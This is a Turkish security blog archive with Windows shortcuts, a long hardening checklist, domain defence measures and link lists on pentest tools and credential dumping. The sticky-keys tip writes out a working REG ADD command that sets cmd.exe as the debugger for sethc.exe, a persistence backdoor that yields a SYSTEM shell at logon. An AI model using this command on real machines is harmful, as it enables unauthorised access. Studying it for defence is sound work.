31 Ekim 2012 Çarşamba

İpuçları: Kısayol Tuşları

Windows İçin Kısayol Tuşları
Run Paneli

  • Winkey + R: Run panelini açar.
  • lusrmgr.msc: "Local Users and Groups"
  • services.msc: "Services"
  • netplwiz: "User Accounts"
  • cmd: "Command Line"
  • mstsc: "Remote Desktop Connection"
  • regedit: "Registry Editor"
  • gpedit.msc: "Local Group Policy Editor"
  • msconfig: "System Configuration"
  • rsop.msc: "Resultant Set of Policy"
  • mmc: "Microsoft Management Console"
  • control nusrmgr.cpl: "User Accounts"


29 Ekim 2012 Pazartesi

İpucu: Bilgisayarı Güvenli Kullanma Yöntemleri


Bilgisayarı Güvenli Kullanma Yöntemleri
  1. Belli aralıklarla bilgisayarınızın veya önemli dosyalarınızın yedeğini (başka bir yerde) alınız.
  2. Uzaktan erişimi (RDP) kapatınız. Bir makineye bağlantı kurulurken, disk paylaşımı gerçekleştirilmemelidir. Kullanılacaksa da en son bağlantı kurulan hedefler saklanmamalıdır. (Parolalar hiç saklanmamalıdır.)
  3. Uzaktan çalışan servisler reddedilmelidir. (Domain'de olan bilgisayarlar için), kullanıcıların hesaplarına ait kendi bilgisayarınızda job/servis/batch varsa bunlar olabildiğince temizlenmelidir. "Log on as a batch job", "Log on as a service" etkin olmamalıdır.
  4. Remote Assistance kullanılmamalıdır.
  5. Network üzerinden makineye erişimi sadece Administrators gerçekleştirebilmelidir. Herkes erişememelidir.Remote Desktop Users'ta, Power Users'ta, Administrators'ta gereksiz kimse olmamalı. "remoteadmin ", "remoteadmin " gibi servisler disable edilebilir. "Access this computer from the network", "Allow log on through Remote Desktop Services" kimsede olmamalı. "Deny access to this computer from the network" için Guests olmalıdır. PSEXEC ile bir başkası bilgisayara bağlanamamalıdır.
  6. Disk NTFS ile formatlanmalıdır.
  7. İşletim sistemi hakları kimsede olmamalıdır."Act as part of the operating system" kimsede olmamalıdır.
  8. Grup ilkelerindeki özellikle "User Rights" çok çok sıkı olmalı. Önemli bile görülmeyebilecek olan "Change the system time" adli Bilişim için önemli olabilir. Bunun yanında "Create a token object", "Debug programs", "Enable computer and user accounts to be trusted for delegation", "Impersonate a client after authentication", "Profile single process", "Replace a process level token", "Allow log on locally", "Increase a process working set", "Take ownership of files or other objects", "Access Credential Manager as a trusted caller" ilkeleri üzerinde iyi durulmalı.
  9. IE site ayarlarından; Trusted Sites için en az Medium, Restricted Sites için High olacak şekilde ayarlanmalıdır. Trusted Sites listesinde çok güvenilen siteler eklenmelidir.
  10. IE üzerinde mobil kodlar(ActiveX, Javascript kodları) kapatılmalıdır veya kullanıcı onayına sunulmalıdır.
  11. İnternette dolaşırken cookie saklanmamalı, kullanılan parolaların hatırlanmaması sağlanmalı, otomatik tamamlama özelliği kapatılmalı, geçmiş kaydedilmemelidir.
  12. IE kullanırken Status Bar açık olmalıdır. Böylece kullanıcı tıkladığı yer ile gittiği yerin aynı olduğundan emin olur. (<a href ="www.XYZ.com"> www.KLM.com<\a> gibi bir durumda yardımcı olabilir. Kullanıcı gideceği adresi incelemelidir.)
  13. Gereksiz eklentiler kaldırılmalıdır.
  14. DNS olarak güvenilir olmayan sunucular kullanılmamalıdır.
  15. Host dosyasında(C:\Windows\System32\drivers\etc\hosts) herhangi bir kayıt eklenmiş olmamalıdır.
  16. İnternette dolaşırken veya mailler okunurken her site tıklanmamalıdır, Tıklanılan hedef ile erişilen hedefin aynı olup olmadığı kontrol edilmelidir, her dosya indirilmemelidir. Dosyaların otomatik indirilmemesi, kullanıcıya sordurulması için gerekli ayarlamalar yapılmalıdır.
  17. Mailleşme, anlık görüşme için PGP/SSL kullanılmalıdır.
  18. İnternet kullanılmayacaksa Ethernet kablosu çekilmelidir veya Wireless kapatılmalıdır. Modem kapatılmalıdır.
  19. Public ortamda wireless kullanılmamalıdır. Ayrıca Wireless ve bluetooth kullanılmadığı zamanlar kapalı olmalı, sormadan otomatik olarak şifresiz veya şifreli ağlara bağlanmaması için gerekli ayarlar yapılamalıdır. Wireless parolası saklanmamalıdır.
  20. Kullanılan modemde SSID gizlenmeli, özelleştirilmeli, kompleks parola kullanılmalıdır.
  21. Makineye güvenilmeyen sertifika yüklenmemelidir.
  22. HTTPS bağlantılarda güvenilir olmayan sitelere giriş yapılmamalıdır. Bu siteler için istisnai durum eklenmemelidir.
  23. HTTPS bağlantılı sitelerde yeşil ikon çıkması beklenmelidir.
  24. Klasör seçeneklerinden gizli dosyaları göster seçeneği işaretlenmelidir. 
  25. Klasör seçeneklerinden bilinen dosya uzantılarını gizle seçeneği işaretlenmemelidir. Her dosyaya ait uzantının izlenebilmesi sağlanmalıdır.
  26. Makinelere BIOS parolası konulmalıdır. BIOS ayarlarının değiştirilmesi için de parola sorgusu ayarlanmalıdır.
  27. Gereksiz yerel kullanıcılar silinmelidir. Administrator ve Guest hesabı etkin olmamalıdır. Administrator parolası ve kullanıcı adı değiştirilmelidir. Guest hesabının adı değiştirilmelidir.
  28. Yerel kullanıcıların hakları gözden geçirilmelidir. Gereksiz olan yetkiler kullanıcılarda alınmalıdır.
  29. Kullanılan makinelerde yönetici hakları ile oturum açılmamalıdır. Sadece yönetici hakları ile gereken işlemler için yönetici hesabı kullanılmalıdır. En fazla 2 tane yönetici haklarına sahip kullanıcı olmalıdır.
  30. Admin hesabı ile çalışan zamanlanmış görevler, prosesler, servisler gözden geçirilmelidir. Gereksiz olanlar iptal edilmelidir.
  31. Kullanılan parola en az 8 karakter olmalıdır. (14 karakterden uzun olması tavsiye edilir)
  32. Kullanılan parola karmaşık düzeyde olmalıdır. Parola; büyük harf, küçük harf, rakam, noktalama işareti ve ayrıca ALT- ile kombinasyon oluşturan bir karakter içermelidir.
  33. Kullanılan parola 3 kere yanlış girilirse hesap 15 dakika boyunca kilitli kalsın.
  34. Kullanılan parola sık sık değiştirilmelidir. Kullanılan bir parola daha önceki parolalardan tahmin edilememelidir.
  35. Makinede kullanılan parola, internette kullanılan parola ile aynı ve benzer olmamalıdır. Bilgisayar parolası tahmin edilememelidir.
  36. MS SQL için, CmdExec rolü kapalı olmalıdır.
  37. Makinede audit log alınması sağlanmalıdır. Success & failure log alınması sağlanmalıdır.
  38. Riskli işlemler yapılırken sanal makine kullanılmalıdır.
  39. Güvenilir olmayan USB/CD gibi taşınabilir ürünleri makineye takılmamalıdır.
  40. Güvenilir olmayan uygulamalar, crackli uygulamalar makinelere yüklenmemelidir.
  41. Makinede belli aralıklarla zafiyet taraması gerçekleştirilmelidir.
  42. CIS'in kontrol listesi ile belli aralıklarda denetim gerçekleştirilmelidir.
  43. Dosya paylaşımları kapatılmalıdır. Gerekli ise, sadece belli kullanıcılara Okuma yetkisi verilmelidir.
  44. Yazıcı paylaşımı kaldırılmalıdır.
  45. LANMAN özetinin tutulması önlenmelidir. Sadece NTLMv2 ile iletişim kabul edilmelidir, diğerleri reddedilmelidir. 
  46. Makinede sistemlere bağlantı için kullanılan biletler saklanmamalıdır. Saklanacaksa da yenilenme süresi kısa tutulmalı, en fazla son 5 bilet saklanmalıdır.
  47. Makinenin çalınma ihtimaline karşı fiziksel kilit koyulmalıdır. Ayrıca izleyici de koyulmalıdır.
  48. Harddiskler tamamen şifrelenmelidir.
  49. Windows güvenlik duvarı açık olmalıdır. Güvenlik duvarındaki istisnai durumlar gözden geçirilmelidir, gereksiz istisnalar silinmelidir. Güvenlik duvarına ait başarılı ve başarısız loglar alınmalıdır.
  50. Kullanıcıların güvenlik duvarına istisna eklemesi için, uyarı verilmesi önlenilmelidir. Aksi halde kullanıcının dalgınlığı ile istisnai durum eklenebilir. 
  51. Windows Update açık olmalıdır. İşletim sistemi otomatik olarak güncellenebilmelidir. Güncelleme sırasında kullanıcı haberdar edilmelidir.
  52. Makinede yüklü programlar güncellenmelidir.
  53. Antivirüs, Antispyware, Antiphishing gibi uygulamalar yüklü, güncel, orijinal (cracksiz), paralı olmalıdır. Belli aralıklarla taramalar gerçekleştirilmelidir. Mümkünse farklı ürünlerle de tarama gerçekleştirilmelidir.
  54. Gereksiz programlar kaldırılmalıdır, portlar ve servisler kapatılmalıdır. Kurulan programlar güvenlik için gerekli konfigürasyon ayarları yapılmalıdır.
  55. Bilgisayar ilk açıldığında çalışan programlar (startup) olabildiğince azaltılmalıdır.
  56. CD/USB kullanımında otomatik çalışmanın önlenmesi için Auto Run kapatılmalıdır.
  57. Ekran koruyucu kullanılmalıdır. Ekran korucu çıktıktan sonra parola sorgulaması yapılmalıdır.
  58. Makinelerde gizli veriler saklanırken şifrelenmelidir. Bunun için Keepass Portable gibi bir parola saklama uygulaması, Şifreleri Excelde saklayıp bu Excel'i şifreleme vs kullanılabilir.
  59. Makinelerde Process Explorer tarzı bir uygulama yüklü olmalı. Şüphelenilen prosesler incelenmelidir.
  60. net, dsquery, taskslist, reg, gpresult, systeminfo,... gibi makineden bilgi alınabilecek komutların çalıştırılmalısı önlenmelidir. Mümkünse CMD kapatılmalıdır. Herhangi birisinin SID bilgilerini ele geçirmesi önlenmelidir.
  61. Makinede ilk oturum açılırken en son hangi kullanıcının oturum açtığı bilgisi saklanmamalıdır.
  62. Smart kart okuyucusu çıkarıldığında makine kilitlenmelidir.
  63. Eğer hangi vakitlerde bilgisayarın açılacağı belli ise, oturum açma takvimi oluşturulmalıdır. Saat 17.00'den sonra kullanıcı oturum açamasın gibi.
  64. Makine ping'e ve broadcast'e kapatılmalıdır.
  65. Uygulamaların desteği varsa parolalı olarak kullanılmalıdır. Örneğin mail yollarken kullanıcı adı/parola bilgileri sorgulansın.
  66. Kullanıcılar, oturumlarını açarken CTRL-ALT-DEL tuş takımının kullanmaya zorlanmalıdır. Bu işlem, Run kısmına "netplwiz" veya "Control Userpasswords2" yazılması ile gelen panelde gerçekleştirilir.
  67. "Ease of access" özelliği kaldırılmalıdır.
  68. PCMCIA, firewire gibi gereksiz fiziksel donanımlar disable edilmeli, kullanılmamalıdır.
  69. Domain ortamında Cached authentication kapatılmalıdır. (Mobil kullanıcılar hariç tutulabilir) 
  70. Bilgisayarda debug mod (kernel mode) etkinliği kontrol edilmelidir.
  71. TCP/IP & Ağ ayarları güvenilir hale getirilmelidir.


İpucu: Kapalı Oturumda Yapışkan Tuşlar ile Yerel Yönetici Kullanıcısı Oluşturma

Yapışkan Tuşlar ile Komut Satırına Geçme
Tehdit
Yerel yönetici hesabı kullanan bir kullanıcının oturumunu açık bırakılması durumunda bu makinede bir arka kapı bırakılarak makinede tam kontrol sağlanabilir.

Senaryo
Yönetici oturumu açık kalmış olan birmakinede kayıt defterine aşağıdaki gibi bir kayıt girilir:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Otumunun kapatıldığını varsayalım. Bu makinenin başına geçen kullanıcı 5 kere SHIFT tuşuna basarak komut satırına geçiş yapabilir. Daha sonra SYSTEM hakları ile bir yönetici kullanıcısı oluşturabilir:
Kaynak site:
http://security.ege.edu.tr/istemciguvenligi/17-kritik-windows-acigi.html

26 Ekim 2012 Cuma

İpucu: WCE'den Kaçınma Yöntemi

WCE'den Kaçınma Yöntemi
Ön Araştırma
Microsoft'a göre bilgisayarlarda, LM saklanmaması için yapılacak 4 temel yöntem varmış:
  • Network security: Do not store LAN Manager hash value on next password change --> Enable olmalı.
  • Network security: LAN Manager authentication level --> Send NTLMv2 response only\refuse LM & NTLM olmalı.
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash --> 1 olmalı.
  • Parola uzunluğu 14 karakterden daha uzun olmalı.
Kaynak site:
http://support.microsoft.com/kb/299656

Kıssa
Bir bilgisayarda (W7 Enterprise, SP1) bu ayarlamalar yapıldı:
Daha sonra aşağıdaki 3 senaryo denendi:
  • Parola uzunluğu 9 karakter olarak ayarlandı. WCE ile bu parola (Deneme123) açık olarak elde edilebildi:

  • Parola uzunluğu 19 karakter olarak ayarlandı. WCE ile bu parola (Deneme123Deneme123!) açık olarak elde edilebildi:
  • Parola uzunluğu 10 karakter (14 veya daha kısa) olarak ayarlandı. Parola oluşturulurken ALT tuşu ile kombinasyon oluşturulacak şekilde karakter de kullanıldı. WCE ile bu parola (Deneme123€) açık olarak elde edilemedi:
Kaynak site:
http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly

Mimikatz
Aynı parola mimikatz ile kısmen yakalanabilmektedir:

Not: Eğer Windows komut satırı aracının font'u Lucida Console olarak ayarlanırsa, özel karakterler de düzgün olarak görüntülenebilir.

Hisse
WCE tarafından yakalanmamak için, ALT tuşu ile kombinasyon oluşturan parolalar kullanılmalıdır. Mimikatz tarafından yakalanmamak için ALT tuşu ile kombinasyon oluşturan farklı karakterler kullanılabilir. Bu karakterlerden bazıları şunlardır: '£', '%', '¨¨', '', 'æ', 'ß', '´´'

ALT tuşu ile kombinasyon oluşturan sayı listesi aşağıdaki gibidir:
http://tlt.its.psu.edu/suggestions/international/accents/codealt.html

ALT tuşu ile kombinasyon oluşturan sayıların kullanımı aşağıdaki gibidir:
http://www.youtube.com/watch?v=5SPlCJ3rwME

8 Ekim 2012 Pazartesi

Pentest Araçları


Sızma Testleri için kullanılabilecek araçlar

Password hashes dump tools
Kaynak site:
https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc#gid=0

Dump Windows password hashes efficiently (6 Parts)
Kaynak site:
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes.html
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes_16.html
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes_20.html
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes_21.html
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes_28.html
http://bernardodamele.blogspot.ca/2011/12/dump-windows-password-hashes_29.html

Companies That Give Back with Free Tools
Kaynak site:
http://www.room362.com/blog/2012/6/20/companies-that-give-back-with-free-tools.html

mimikatz
Protecting Privileged Domain Accounts: Disabling Encrypted Passwords
Kaynak site:
http://blog.gentilkiwi.com/mimikatz
http://computer-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
http://cyberarms.wordpress.com/2012/04/16/remotely-recovering-windows-passwords-in-pl/
http://www.infosecisland.com/blogview/22398-Completely-In-memory-Mimikatz-with-Metasploit.html
http://www.slideshare.net/ASF-WS/asfws-2012-mimikatz-par-benjamin-delpy
http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html
http://blogs.technet.com/b/security/archive/2012/12/11/new-guidance-to-mitigate-determined-adversaries-favorite-attack-pass-the-hash.aspx

Windows Credentials Editor (WCE)
Dumping Clear Text Passwords
Kaynak site:
http://www.ampliasecurity.com/research/wcefaq.html
http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
http://e-spohn.com/blog/2012/07/06/dumping-clear-text-passwords/

Firefox Addons For Penetration Testing
Kaynak site:
http://pentestlab.wordpress.com/2012/08/12/firefox-addons-for-penetration-testing/?goback=%2Egde_100569_member_143704728

Hping network scanning and crafting tool.
Kaynak site:
http://hackinmania.blogspot.in/2012/07/hping-network-scanning-and-crafting.html

Hash <--> Password
Kaynak siteler:
https://www.objectif-securite.ch/ophcrack.php
http://www.md5decrypter.co.uk/ http://www.darknet.org.uk/2014/02/hash-identifier-identify-types-of-hashes-used-encrypt-passwords//

Sızma Testlerinden Korunma Yolları: Domain


Domain için Önlemler

Bilgisayarların CD/USB'den boot edilmesi önlenmelidir.
  • BIOS ayarlarından CD-ROM / BIOS yolu ile boot işlemi iptal edilmelidir. Makinenin öncelikle harddisken başlaması için gerekli ayarlar yapılmalıdır.
  • BIOS ayarı yapılmaya çalışılırken şifre sorgulaması yapılmalıdır.
  • Makinelerde diskler tamamen şifrelenmelidir(Full Disk Encryption). Bu şekilde makine boot edilse bile SAM/SYSTEM dosyaları elde edilemeyecektir.
  • Makinelerde LM özetlerinin saklanmamalıdır. En az NTLM şifreleme metodu kullanılmalıdır.

Ağ yapılandırması gözden geçirilmelidir.
  • Gerekli olmayan portlar ve servisler kapatılmalıdır.
  • Ağ üzerinde kurallar tanımlayarak; belirlenen IP’lere, belirlenen portlardan kontrollü bir şekilde izin verilmelidir.
  • Gereksiz paylaşımlar kullanıma kapatılmalıdır. 
  • Açılan paylaşımlardaki izinler sadece erişmesi gerekenlerin ulaşabilmesine olanak verecek şekilde ayarlanmalıdır. Yönetimsel paylaşımlar eğer kullanımları gerekmiyor ise domain politikaları ile kaldırılmalıdır.

Zafiyetler giderilmeli ve sistemler güncellenmelidir.
  • Belli periyotlarla zafiyet taraması gerçekleştirilmelidir.
  • Acil olan zafiyetler gerekiyorsa hemen giderilmelidir.
  • Sistemlere son yamalar geçilmelidir.
  • Zafiyetler için kurum politikası belirlenmelidir.
  • AV, IDS/IPS, ADS gibi sistemlerin imzaları güncel tutulmalıdır.
  • Uzaktan kod çalıştırmaya olanak sağlayan bazı kritik açıklıklar şunlardır:
    • MS09-001 / Critical: Vulnerabilities in SMB Could Allow Remote Code Execution (958687)
    • MS08-067 / Critical: Vulnerability in Server Service Could Allow Remote Code Execution (958644)
    • MS05-051 / Critical: Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)
    • MS06-040 / Critical: Vulnerability in Server Service Could Allow Remote Code Execution (921883)
    • MS05-027 / Critical: Vulnerability in Server Message Block Could Allow Remote Code Execution (896422)
    • MS05-035 / Critical: Vulnerability in Microsoft Word Could Allow Remote Code Execution (903672)
    • MS09-050 / Critical: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)
    • MS08-059 / Critical: Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
    • MS09-004 / Important: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)

İmajların yapılandırılmasına özen gösterilmelidir.
  • Zafiyet taramaları sonucunda elde edilen sonuçlara göre gerekiyorsa imajlar güncellenmelidir.
  • Mevcut sistemlerde gerekli olmayan yerel yönetici kullanıcıları (administrator) devre dışı bırakılmalı ve isimleri her makine için farklı olacak şekilde değiştirilmelidir. Böylece yapılacak saldırıda yerel yönetici hesabının isminin kolayca ve otomatik olarak bulunmasını zorlaştıracaktır. Ayrıca SID değerini kontrol etmeyen saldrgan yanlış yönlendirilecektir. Devre dışı bırakılan Administrator kullanıcısı yerine hakları, izinleri ve grup üyelikleri sınırlandırılmış bir standart kullanıcı oluşturulmalıdır. Oluşturulan bu tuzak yönetici hesabının adı Administrator, tanımı klasik yerel yönetici kullanıcısına ait tanım ("Built-in account for administering the computer/domain") olarak ayarlanmalıdır.Bu kullanıcı kullanılarak saldırgan yanlış yönlendirilebilir. 
    • Parolası olabildiğince uzun (127 karakter olabilir) veriler ve bu hesap devre dışı bırakılabilir.  Saldırganın zaman kaybetmesi sağlanır.
    • Parolası kolayca elde edilebilecek şekilde kısa ayarlanabilir. Daha sonra bu hesap ile bir kez oturum açılarak hesap etkin olarak bırakılabilir. Bu hesap ile yapılan işlemlerin denetim kayıtları tutularak bu hesaplar ile yapılan işlemlerden anlık olarak haberdar olunması sağlanabilir.Böylece muhtemel saldırının önüne de geçilebilir.
  • Kurulan makinelerdeki yerel kullanıcılara ait şifre özetleri, diğer makinelere erişim için kullanılabileceğinden, kurumdaki makinelerde bulunan yerel yönetici şifrelerinin farklı olmasına özen gösterilmelidir.
  • Kurumdaki makinelerin yerel yönetici kullanıcılarına ait şifreler belli periyotlarla manuel olarak değiştirilmelidir. Bu işi saatlik olarak gerçekleştiren araçlar kullanılmalıdır.
  • Yerel yönetici hesaplarının şifreleri, şifre kırma saldırılarına karşı korumak amacıyla karmaşık seçilmelidir.

Domain hakkında bilgi edinilmesi zorlaştırılmalıdır.
  • Kullanıcıların komut satnetırı kullanabilmeleri önlenmelidir.
  • Komut satırından "net", "gpresult" komutu gibi domain hakkında bilgi alınmasını sağlayabilecek komutların kullanılması önlenmelidir. Domain hakkında elde edilebilecek komutların bir kısmı için bakınız: 
  • Domain yöneticileri gibi yetkili kullanıcıların bulundukları grupların adları, dikkat çekmeyecek şekilde değiştirilmelidir.

Son kullanıcılar ve bilgisayarları belli periyotlarla kontrol edilmelidir.
  • Makinelerde yüksek yetkili kullanıcı hakları ile çalıştırılan gereksiz prosesler sonlandırılmalıdır.
  • Makinelere giren kullanıcılar, işlemleri bittikten sonra bilgisayarlarını yeniden başlatmaya (restart) zorlanmalıdır.
  • Domain yöneticileri gibi, önemli gruplardaki kullanıcıların iki tane hesabı olmalıdır. Bu hesaplardan birisi domain üzerinde işlem yapma haklarına sahip oldukları yetkili hesaptır. İkinci hesap ise, domaindeki normal kullanıcılar gibi, yetkisiz hesaptır. Domain yöneticileri yetkili hesaplarını sadece domain işlemlerini yaparken kullanmalıdır, bu hesapla domain controller haricinde gerekmedikçe herhangi bir yere giriş yapılmamalıdır. Farklı sistemlere giriş için yetkisiz / az yetkili hesap kullanılmalıdır. 
  • Önemli gruplarda olan yetkili kullanıcılar bu hesaplarını sadece domaine kullanıcı ekleme, domainden kullanıcı çıkarma, grup politikasını güncelleme gibi işlemler için kullanmalıdır. Domain controller gibi, belli ve sınırlı sayıdaki makinelere bu kullanıcı ile giriş yapılmalıdır.
  • Gereksiz paylaşımlar kullanıma kapatılmalıdır. Dosya sunucularına, domain üzerinde yüksek haklara sahip kullanıcıların hesabı ile girilmemelidir.
  • Domainde etkin olacak servis hesaplarına, sadece gerçekleştirecekleri işlemler için gerekli olan haklar verilmelidir. Bu tür hesapların kullanıcı oluşturma, silme, şifre değiştirme gibi işlemleri veya interaktif oturum açma gibi işlemleri yapmaya hakları olmamalıdır.
  • Dosya sunucularına, domain üzerinde yüksek haklara sahip kullanıcıların hesabı ile girilmemelidir.
  • Yerel yönetici hesapları gibi domaindeki kullanıcıların şifreleri de , şifre kırma saldırılarına karşı korumak amacıyla karmaşık seçilmelidir. Bu amaçla grup politikaları güncellenmelidir.
  • Güvenli şifre politikaları belirlenmelidir. Aşağıdaki ayarlar uygulanabilir:
    • Enforce password history: 5 Şifre
    • Maximum Password Age: 30 Gün
    • Minimum Password Age: 1 Gün
    • Minimum Password Length: 8 Karakter (en az)
    • Passwords must meet complexity requirements: Etkin
    • Store password using reversible encryption: Devre dışı
  • Domaindeki kullanıcılara ilgili makinelerde yönetici hakkı verilmemelidir. Gerekli olan haklar geçici olacak şekilde verilmelidir.
  • Kullanıcılar makinelerinde yönetici hesapları ile oturum açmamalıdır. Yönetimsel operasyon yapılacak ise, “Run as” ile yönetici hesabına geçiş yapılmalıdır.
  • Son kullanıcıların makinelerinde parolaları içeren dosyalar açık halde tutulmamalıdır, şifrelenmelidir.
  • Domaindeki yetkili kullanıcıların biletleri, çıkış yapıldıktan itibaren otomatik olarak silinecek şekilde yapılandırma yapılmalıdır.
  • RDP yapılmamalıdır. Yapılması gerekiyorsa da her erişim sonrası oturumlar kapatılmalıdır (logoff), mümkünse makine yeniden başlatılmalıdır (restart). RDP yapılan hesapların domain üzerinde yetkili olmamasına dikkat edilmelidir.

Audit işlemleri aktif olmalıdır.
  • Yerel makinelerdeki ve domaindeki işlemlerin logları alınmalıdır.
  • Ağdaki anormallik durumları için alarmlar oluşturulmalıdır. Port taramalar engellenmelidir.
  • Domainde kullanıcı oluşturma/silme işlemleri, hak yükseltme/düşürme işlemleri, kullanıcıları gruba ekleme/çıkarma işlemleri,... gözlenmelidir.

Pentest Senaryoları

Senaryolar

Deneme Ortamı: Free Metasploit Penetration Testing Lab In The Cloud
Kaynak site:
https://community.rapid7.com/community/metasploit/blog/2013/01/08/free-metasploit-penetration-testing-lab-in-the-cloud

Create Exploit Using Msfvenom to Hack Windows 7 SP1
Kaynak site:
http://vishnuvalentino.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/

5 Ways to Find Systems Running Domain Admin Processes
Kaynak site:
http://www.netspi.com/blog/2012/07/09/5-ways-to-find-systems-running-domain-admin-processes/

Dumping Clear Text Passwords
Kaynak site:
http://e-spohn.com/blog/2012/07/06/dumping-clear-text-passwords/

Yapışkan Tuşlar ile Komut Satırına Geçme
Kaynak site:
http://ertugrulbasaranoglu.blogspot.com/2012/10/ipucu-kapal-oturumda-yapskan-tuslar-ile.html

Bypass Windows Logons with the Utilman.exe Trick
Kaynak site:
http://www.technibble.com/bypass-windows-logons-utilman/
http://www.youtube.com/watch?feature=endscreen&v=di3BIqq40bE&NR=1

Winlockpwn: More then a Partytrick
Kaynak site:
http://www.spylogic.net/2008/05/winlockpwn-more-then-a-partytrick/
http://www.youtube.com/watch?v=jbOioD8LU5Y

Inception
Kaynak site:
http://www.breaknenter.org/projects/inception/

BeeF + Social-Engineering + Metasploit
Kaynak site:
https://www.youtube.com/watch?feature=player_embedded&v=EPJWsElU0fs

Owning Windows Networks with Responder 1.7
Kaynak site:
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html

Finding Admin Access
Kaynak site:
http://www.room362.com/blog/2012/10/30/finding-admin-access.html

Hack netNTLM Credential using Microsoft Word UNC Path Injector
Kaynak site:
http://www.hackingarticles.in/hack-netntlm-credential-using-microsoft-word-unc-path-injector/

Metasploit ile Oracle Veritabanlarına Yönelik Temel Sızma Testleri
Kaynak site:
http://www.agguvenligi.net/2013/07/metasploit-ile-oracle-pentest.html

Metasploit Modülleri: Zafiyetler

Zafiyetler ve Modüller

MS09-067: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)
exploit/windows/fileformat/ms09_067_excel_featheader
Kaynak site:
http://eromang.zataz.com/2011/02/06/ms09-067-microsoft-excel-malformed-featheader-record-vulnerability/

MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485)
Kaynak site:
http://blogs.technet.com/b/srd/archive/2011/08/09/vulnerabilities-in-dns-server-could-allow-remote-code-execution.aspx
http://technet.microsoft.com/en-us/security/bulletin/ms11-058

6 Ekim 2012 Cumartesi

Okunası Makaleler: Temel UNIX / Linux

Temel UNIX / Linux Makaleleri

Unix Denetimi

Kaynak site:
http://blog.btrisk.com/2014/04/unix-denetimi.html

Kabuk Programlama
Kaynak site:
http://yunus.hacettepe.edu.tr/~yurdugul/3/indir/KabukProgramlama.pdf

UNIX İşletim Sistemi ve Utility Komutları
Kaynak site:
http://yavuzbugra.wordpress.com/2011/02/13/1329/

Security Incident Response
Kaynak site:
http://blog.basementpctech.com/2012/02/incident-response-on-live-unix-system.html?m=1

UNIX shell differences and how to change your shell
Kaynak site:
http://www.softlab.ntua.gr/facilities/documentation/unix/shelldiff.html

Temel Linux Komutları
Kaynak site:
http://ertugrulbasaranoglu.blogspot.com/2013/02/ipucu-temel-linux-komutlar.html

Local Linux Enumeration & Privilege Escalation Cheatsheet
Kaynak site:
http://www.rebootuser.com/?p=1623

Okunası Makaleler: Group Policy

Group Policy Makaleleri

Configure Account Lockout Policies

Kaynak site:
http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Security/AccountLockoutPolicies.html

How to use Group Policy to Allow or Block URL’s
Kaynak site:
http://www.grouppolicy.biz/2010/07/how-to-use-group-policy-to-allow-or-block-urls/

Add Domain Users to local Remote Desktop Users group using Group Policy
Kaynak site:
http://www.vkernel.ro/blog/add-domain-users-to-local-remote-desktop-users-group-using-group-policy

Windows Group Policy Settings
Kaynak site:
http://www.vanstechelman.eu/windows/group_policy_settings

Exploiting Windows 2008 Group Policy Preferences
Kaynak site:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Okunası Makaleler: Kerberos / NTLM / LM

Kerberos / NTLM / LM Makaleleri

Comparing Windows Kerberos and NTLM Authentication Protocols

Kaynak site:
http://www.windowsitpro.com/article/kerberos/comparing-windows-kerberos-and-ntlm-authentication-protocols

LANMAN Şifre Özetinin Zayıflıkları
Kaynak site:

How I Cracked your Windows Password
Kaynak site:
http://blog.csdn.net/wangjiannuaa/article/details/6741650

NTLM Challenge Response is 100% Broken (Yes, this is still relevant)
Kaynak site:
http://markgamache.blogspot.com/2013/01/ntlm-challenge-response-is-100-broken.html

Kimlik Doğrulama: Kerberos
Kaynak site:
http://ertugrulbasaranoglu.blogspot.com/2013/01/notlar-kerberos.html

Okunası Makaleler: Temel Network

Temel Network Makaleleri

Routing Protokolleri

Kaynak site:
http://www.atam.com.tr/genel/kutuphane/CiscoCBT_TR/DATA/ITM/ROUTING/ROUTING.HTM

Veri ve Ağ Güvenliği Ders Notları
Kaynak site:
http://perweb.firat.edu.tr/personel/yayinlar/fua_102/102_78422.pdf

Türkçe Cisco Notları
Kaynak site:
http://iys.inonu.edu.tr/webpanel/dosyalar/910/file/CISCO.pdf

Protocol Numbers
Kaynak site:
http://technet.microsoft.com/en-us/library/cc959827.aspx

How to Block an IP Address using IPSec
Kaynak site:
http://www.serverintellect.com/support/windowsserversecurity/ipsec-blockip.aspx

NSEDoc Reference Portal
Kaynak site:
http://nmap.org/nsedoc/

Nmap Kullanım Kitapçığı
Kaynak site:
http://www.bga.com.tr/calismalar/nmap_guide.pdf

Nmap Kullanım Kılavuzu (Şu anda hizmet dışı)
Kaynak site:
http://www.bayar.edu.tr/bid/dokumanlar/nmap_kullanim_kilavuzu.pdf

Nessus Kurulum, Kullanım Kılavuzu v1.0 - Ulak-CSIRT
Kaynak site:
http://csirt.ulakbim.gov.tr/dokumanlar/nessus.pdf

Why can't I connect with a 169.254.x.x IP address?
Kaynak site:
http://ask-leo.com/why_cant_i_connect_with_a_169254xx_ip_address.html

